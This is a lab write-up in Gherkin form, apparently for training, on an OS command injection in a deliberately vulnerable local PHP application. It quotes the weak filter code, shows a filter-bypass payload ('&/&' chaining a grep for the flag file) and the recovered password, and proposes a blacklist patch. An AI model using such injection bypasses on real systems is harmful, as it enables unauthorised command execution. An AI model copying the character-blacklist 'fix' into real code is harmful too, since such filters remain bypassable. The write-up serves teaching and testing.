## Version 1.4.1
## language: en

Feature:
  TOE:
    Vulnerable Web Application
  Category:
    OS Command Injection
  Location:
    http://localhost:9991/www/CommandExecution/CommandExec-2.php
    typeBox (field)
  CWE:
    CWE 78: Improper Neutralization of Special Elements used in an OS Command
    ('OS Command Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Get the flag in "comex2/log2.txt"
  Recommendation:
    Pass each entry through a filter in search of malicious characters

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Debian          | Buster      |
    | Firefox         | 68.9.0      |
  TOE information:
    Given I am accesing the site
    And a text box
    And The app is running on XAMPP 5.6.21

  Scenario: Normal use case
    Given a common textbox asking for a name
    When I submit the textbox with my name
    Then The app doesn't give any response

  Scenario: Static detection
    When I watch the source code
    Then I can see a function inside the PHP code
    """
    $substitutions = array('&&' => '',';'  => '','/' => '','\\' => '' );
    $target = str_replace(array_keys($substitutions),$substitutions,$target);
    echo shell_exec($target);
    """
    And As seen, some characters are deleted
    """
    '&&',';','/','\\'
    """
    And execute the given command without the previous characters

  Scenario: Dynamic detection
    When I test if the commands operate "ping -c 3 www.google.com"
    Then the program shows the command output
    And I can see the command in the URL
    Then I can conclude that I can execute commands
    When I use "ls -l"
    And the app use the method of the protocol HTTP GET for send the message
    And [evidence](image1.png)

  Scenario: Exploitation
    Given I can execute commands
    And that the characters "'&&',';','/','\\'" are removed
    Then I use "ls *"
    Then I get the complete list of files and directories
    """
    CommandExec-1.php CommandExec-2.php CommandExec-3.php CommandExec-4.php
    commandexec.html
    comex1: log1.txt
    comex2: log2.txt
    comex3: log3.txt
    """
    When I use "cd comex2 &/& grep '[Ppassword]' log2.txt"
    Then I obtain the password
    """
    password:Trochilidae
    """
    Then I can conclude that the filters are not strong enough

  Scenario: Remediation
    Given I have patched the code by doing
    """
    $substitutions = array('&&'=>'','& ' => '','&& ' => '',
    ';'  => '','|' => '','-'  => '','$'  => '','('  => '',
    ')'  => '','`' => '','||' => '','/' => '','\\' => '',);
    """
    Then the filter is stronger
    When I use "cd comex2 &/& grep '[Ppassword]' log2.txt"
    Then the command is not executed
    And the vulnerability is patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.5/10 (Medium) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.4/10 (Medium) - RL:W
  Environmental: Unique and relevant attributes to a specific user environment
    6.4/10 (Medium) - CR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-08-30
